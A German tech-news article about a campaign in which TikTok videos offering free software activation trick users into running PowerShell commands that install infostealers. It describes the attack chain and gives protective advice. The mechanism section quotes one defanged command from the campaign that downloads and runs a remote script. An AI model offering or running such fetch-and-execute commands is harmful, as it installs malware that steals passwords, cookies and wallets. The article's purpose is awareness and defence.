Überspringen Sie zu Inhalten
Thor News

Thor News

The Hub Of Relevance for Tech & Gaming

Primäres Menü
  • Tech
    • Enterprise-Tech
    • Markt/Politik
  • Gaming
    • Hardware
      • Nintendo
      • PlayStation 5
      • PlayStation 6
      • Handheld
    • Spiele
  • Hardware
    • Notebook
    • CPU
    • GPU
    • Festplatten
    • NVMe
  • Künstliche Intelligenz
  • Gadgets & Devices
    • Apple
    • Android
  • Wissenschaft
    • Astronomie
  • Developers
  • Entertainment
Hell/dunkler Knopf
  • Heim
  • Cybersecurity
  • TikTok-Videos gezielt für ClickFix-Infostealer genutzt
  • Cybersecurity

TikTok-Videos gezielt für ClickFix-Infostealer genutzt

20.10.2025, 12:52 Uhr 4 minutes read
TikTok-Videos gezielt für ClickFix-Infostealer genutzt

Eine aktuelle Angriffswelle zeigt, wie die Social-Media-Plattform TikTok zunehmend zur Verbreitung von Informations-Diebstahl (Infostealer) genutzt wird – und zwar über eine Methode mit dem Namen ClickFix. Eine „ClickFix-Attacke“ lockt Nutzer mit vermeintlichen Soforthilfe-Videos oder Aktivierungstipps in die Ausführung gefährlicher Skripte. Laut einer Analyse von Bleeping Computer vom 19. Oktober 2025 erfolgt diese Kampagne exakt über TikTok-Videos, die Nutzer zur Ausführung von PowerShell-Befehlen animieren.

Inhaltsverzeichnis

Toggle
  • Wie funktioniert eine ClickFix-Infostealer-Attacke über TikTok?
  • Warum gelingt der Angriff über TikTok so gut?
  • Welche Folgen ergeben sich aus einer erfolgreichen Infektion?
  • Wie schützt man sich konkret vor solchen TikTok-ClickFix-Angriffen?
  • Ausblick: Bedeutung und Handlungsempfehlung
  • Quellen

Wie funktioniert eine ClickFix-Infostealer-Attacke über TikTok?

In der konkreten Kampagne zeigen TikTok-Videos vermeintliche Aktivierungstipps für beliebte Software wie Windows, Microsoft 365, Adobe Photoshop, CapCut Pro oder Spotify Premium. Nutzer werden aufgefordert, ein Kommando in der PowerShell einzugeben – zum Beispiel iex (irm slmgr[.]win/photoshop). Hinter dieser scheinbar harmlosen Hilfe verbirgt sich jedoch das Herunterladen und Ausführen von Malware.

Nach der Ausführung wird über den Befehl ein Skript geladen, das eine erste ausführbare Datei herunterlädt – häufig eine Variante von Aura Stealer – gefolgt von einem zweiten Skript, das für dauerhafte Systemzugriffe sorgt. So erhält der Angreifer Kontrolle über den Rechner, ohne dass der Nutzer es sofort bemerkt.

Warum gelingt der Angriff über TikTok so gut?

Drei Faktoren machen diese Angriffe besonders tückisch. Erstens: Das Video-Format vermittelt Authentizität – viele Nutzer glauben, echte Hilfe zu bekommen. Zweitens: Die Videos wirken meist maschinell erstellt, oft mit KI-Stimmen und minimalen Variationen, was massenhafte Verbreitung ermöglicht. Drittens: Der Angriff erfolgt nicht durch Schadcode auf TikTok selbst, sondern durch soziale Manipulation („Social Engineering“) – Nutzer führen den Code freiwillig aus. Dadurch greifen klassische Sicherheitsfilter kaum.

Besonders gefährlich ist, dass diese Videos häufig auch auf anderen Plattformen wie YouTube Shorts oder Instagram Reels gespiegelt werden. Das erschwert die Nachverfolgung und ermöglicht Cyberkriminellen, ihre Inhalte trotz Löschungen schnell neu zu verbreiten.

Welche Folgen ergeben sich aus einer erfolgreichen Infektion?

Wird ein System kompromittiert, kann eine Infostealer-Malware wie Vidar oder StealC eine Vielzahl sensibler Daten abgreifen: Browser-Passwörter, Cookies, Kryptowährungs-Wallets, Screenshots und Authentifizierungs-Daten. Auch gespeicherte Passwörter aus Anwendungen wie Discord, Telegram oder Steam sind betroffen. Die entwendeten Informationen werden anschließend auf Marktplätzen im Darknet weiterverkauft oder für gezielte Angriffe genutzt.

Im Fall der aktuellen TikTok-Kampagne wird die Schadsoftware so ausgeführt, dass sie sofort mit Administratorrechten startet. Dadurch kann sie unbemerkt Änderungen am System vornehmen, Prozesse nachladen oder weitere Schadprogramme installieren.

Wie schützt man sich konkret vor solchen TikTok-ClickFix-Angriffen?

Es gibt mehrere effektive Schutzmaßnahmen. Keinen Code aus sozialen Medien ungeprüft ausführen. Wenn ein Video auffordert, PowerShell zu öffnen und Befehle einzugeben, sollte man sofort misstrauisch werden. Selbst scheinbar harmlose Befehle können Skripte nachladen, die das System kompromittieren.

Software sollte ausschließlich über offizielle Anbieter oder Stores heruntergeladen werden. „Gratis-Aktivierungen“ oder „Free-Cracks“ sind ein häufiger Köder für Schadsoftware. Zwei-Faktor-Authentifizierung (2FA) bietet zusätzlichen Schutz, falls Passwörter bereits kompromittiert wurden. Außerdem sollten Passwörter regelmäßig geändert und Sicherheits-Tools aktuell gehalten werden.

Unternehmen sollten Mitarbeitende im Umgang mit Social-Media-Inhalten schulen. Social Engineering bleibt einer der häufigsten Einfallspunkte für Angriffe. Sicherheitslösungen können verdächtige Aktivitäten – etwa ungewöhnliche PowerShell-Befehle oder Einträge im Autostart – erkennen und blockieren, bevor größerer Schaden entsteht.

Ausblick: Bedeutung und Handlungsempfehlung

Die Nutzung von TikTok als Verbreitungsweg für ClickFix-Infostealer zeigt, wie flexibel Cyberkriminelle auf Trends reagieren. Social-Media-Plattformen werden zunehmend zum Einfallstor für Schadsoftware, weil sie Vertrauen schaffen und Millionen von Menschen täglich erreichen. Die ClickFix-Technik selbst ist nicht neu – sie wurde bereits 2024 beobachtet –, doch TikTok als Träger dieser Angriffe verleiht ihr eine neue Reichweite.

Für Nutzer bedeutet das: Es reicht nicht, keine verdächtigen Links anzuklicken. Auch scheinbar harmlose Handlungsanweisungen aus Videos können gefährlich sein. Wer aufgefordert wird, Systembefehle auszuführen, sollte stets innehalten und den Rat mit offiziellen Quellen abgleichen. Eine kurze Überprüfung kann verhindern, dass ganze Systeme kompromittiert werden.

Fazit: Videotutorials können hilfreich sein – aber sie sind keine offizielle Fehlerdiagnose. Wer sich auf Social-Media-Clips verlässt, um technische Probleme zu lösen, sollte stets Vorsicht walten lassen. Offizielle Anleitungen von Microsoft, Adobe oder anderen Software-Herstellern sind immer die sichere Wahl.

Cybercrime: Eine Einführung
Cybercrime: Eine Einführung
Amazon Prime
27,99 EUR
Bei Amazon kaufen
Hacked! Das Cybercrime-Rätselbuch: Knacke Codes und überliste Hacker | 100 spannende Rätsel für Erwachsene und Jugendliche - Codes, Kryptogramme, ... erwachsene Rätselfreunde (Rätseln, Quizzen))
Hacked! Das Cybercrime-Rätselbuch: Knacke Codes…
Amazon Prime
15,00 EUR
Bei Amazon kaufen
Angebot Internetkriminalität: Grundlagenwissen, erste Maßnahmen und polizeiliche Ermittlungen
Internetkriminalität: Grundlagenwissen, erste…
19,24 EUR
Bei Amazon kaufen

Quellen

  • TikTok videos continue to push infostealers in ClickFix attacks — BleepingComputer (19.10.2025)
  • TikTok videos + ClickFix tactic = Malware infection — Help Net Security (23.05.2025)
  • Beware: ClickFix Scams on TikTok Hide Dangerous Malware — Techopedia

Über den Autor

Avatar-Foto

Sebastian Schiebort

Administrator

Alle Beiträge anzeigen

Letzte Aktualisierung am 4.02.2026 / Affiliate Links / Bilder von der Amazon Product Advertising API. Alle hier angezeigten Preise und Verfügbarkeiten gelten zum angegebenen Zeitpunkt der Einbindung und können sich jederzeit ändern. Der Preis und die Verfügbarkeit, die zum Kaufzeitpunkt auf Amazon.de angezeigt werden, sind maßgeblich. Als Amazon-Partner verdienen wir an qualifizierten Verkäufen.

Keine ähnlichen Artikel gefunden.

  • Cybersecurity

Post navigation

Previous: Biologischer Computer: Leben auf dem Chip
Next: US-Produktion von Blackwell-Wafer: Meilenstein für NVIDIA & TSMC

Andere Beiträge des Autors

Commodore 128: CES-Premiere 1985, Technik und Vermächtnis Commodore 128 CES-Premiere 1985, Technik und Vermächtnis

Commodore 128: CES-Premiere 1985, Technik und Vermächtnis

06.01.2026, 03:40 Uhr 0
GlassWorm Malware: neue Mac-Welle mit Krypto-Trojanern GlassWorm Malware neue Mac-Welle mit Krypto-Trojanern

GlassWorm Malware: neue Mac-Welle mit Krypto-Trojanern

04.01.2026, 19:51 Uhr 0
Nano Banana 2 Flash: Googles schnellste Bild-KI 2026 Nano Banana 2 Flash Googles schnellste Bild-KI 2026

Nano Banana 2 Flash: Googles schnellste Bild-KI 2026

02.01.2026, 18:14 Uhr 0
ChatGPT-Hardware: OpenAI setzt auf Stimme & Emotion ChatGPT-Hardware OpenAI setzt auf Stimme Emotion

ChatGPT-Hardware: OpenAI setzt auf Stimme & Emotion

01.01.2026, 18:22 Uhr 0

Ähnliche Themen

GlassWorm Malware neue Mac-Welle mit Krypto-Trojanern
6 minutes read
  • Developers
  • Cybersecurity

GlassWorm Malware: neue Mac-Welle mit Krypto-Trojanern

04.01.2026, 19:51 Uhr 0
Google dementiert angebliche Datenpanne mit 183 Mio. Accounts
4 minutes read
  • Cybersecurity

Google dementiert angebliche Datenpanne mit 183 Mio. Accounts

28.10.2025, 00:17 Uhr 0
Massiver Cyberangriff auf WordPress-Websites Alte Plugins öffnen Tür für Remote Code Execution
3 minutes read
  • Cybersecurity

WordPress-Sicherheitslücke: Millionen Websites durch alte Plugins gefährdet

27.10.2025, 07:12 Uhr 0
AWS-Ausfall legt smarte Matratzen von Eight Sleep lahm
4 minutes read
  • Cybersecurity

AWS-Ausfall legt smarte Matratzen von Eight Sleep lahm

24.10.2025, 18:11 Uhr 0
Prosper bestätigt Datenleck – 17 Millionen Nutzer betroffen
2 minutes read
  • Cybersecurity

Prosper bestätigt Datenleck – 17 Millionen Nutzer betroffen

20.10.2025, 16:18 Uhr 0
Satellitenkommunikation Offene Sicherheitslücken aufgedeckt
3 minutes read
  • Cybersecurity

Satellitenkommunikation: Offene Sicherheitslücken aufgedeckt

17.10.2025, 04:06 Uhr 0

Trends

Bald kein Prime-Sharing mehr – droht das auch in Deutschland? amazon_prime_stop 1

Bald kein Prime-Sharing mehr – droht das auch in Deutschland?

09.09.2025, 09:01 Uhr 0
Gaming Notebook mit Nvidia RTX 5090 – Razer Blade 18 Razer_RTX5090_Notebook 2

Gaming Notebook mit Nvidia RTX 5090 – Razer Blade 18

30.08.2025, 19:07 Uhr 0
Dying Light: The Beast uncut in Deutschland: So geht’s Dying Light The Beast 3

Dying Light: The Beast uncut in Deutschland: So geht’s

19.09.2025, 10:49 Uhr 0
Dying Light: The Beast – Neuer Trailer zeigt Mortal-Kombat-Brutalität Dying Light The Beast 4

Dying Light: The Beast – Neuer Trailer zeigt Mortal-Kombat-Brutalität

05.08.2025, 18:44 Uhr 0

Neueste Beiträge

  • Commodore 128: CES-Premiere 1985, Technik und Vermächtnis
  • GlassWorm Malware: neue Mac-Welle mit Krypto-Trojanern
  • Nano Banana 2 Flash: Googles schnellste Bild-KI 2026
  • ChatGPT-Hardware: OpenAI setzt auf Stimme & Emotion
  • Fractal Design Scape Headset Review: Mein Fazit

Neueste Kommentare

Es sind keine Kommentare vorhanden.

Archiv

  • Januar 2026
  • November 2025
  • Oktober 2025
  • September 2025
  • August 2025
  • Juli 2025

Könnte dich auch interessieren

Commodore 128 CES-Premiere 1985, Technik und Vermächtnis
6 minutes read
  • Retrogaming

Commodore 128: CES-Premiere 1985, Technik und Vermächtnis

06.01.2026, 03:40 Uhr 0
GlassWorm Malware neue Mac-Welle mit Krypto-Trojanern
6 minutes read
  • Developers
  • Cybersecurity

GlassWorm Malware: neue Mac-Welle mit Krypto-Trojanern

04.01.2026, 19:51 Uhr 0
Nano Banana 2 Flash Googles schnellste Bild-KI 2026
5 minutes read
  • Künstliche Intelligenz

Nano Banana 2 Flash: Googles schnellste Bild-KI 2026

02.01.2026, 18:14 Uhr 0
ChatGPT-Hardware OpenAI setzt auf Stimme Emotion
6 minutes read
  • Künstliche Intelligenz

ChatGPT-Hardware: OpenAI setzt auf Stimme & Emotion

01.01.2026, 18:22 Uhr 0
Cookie-Einstellungen ändern
  • Impressum
  • Datenschutzerklärung
  • Über uns
  • Redaktionelle Richtlinien
  • Kontakt
  • Facebook
  • x.com
  • WhatsApp
  • Flipboard
  • RSS Feed
Alle Rechte vorbehalten. Copyright © thor.news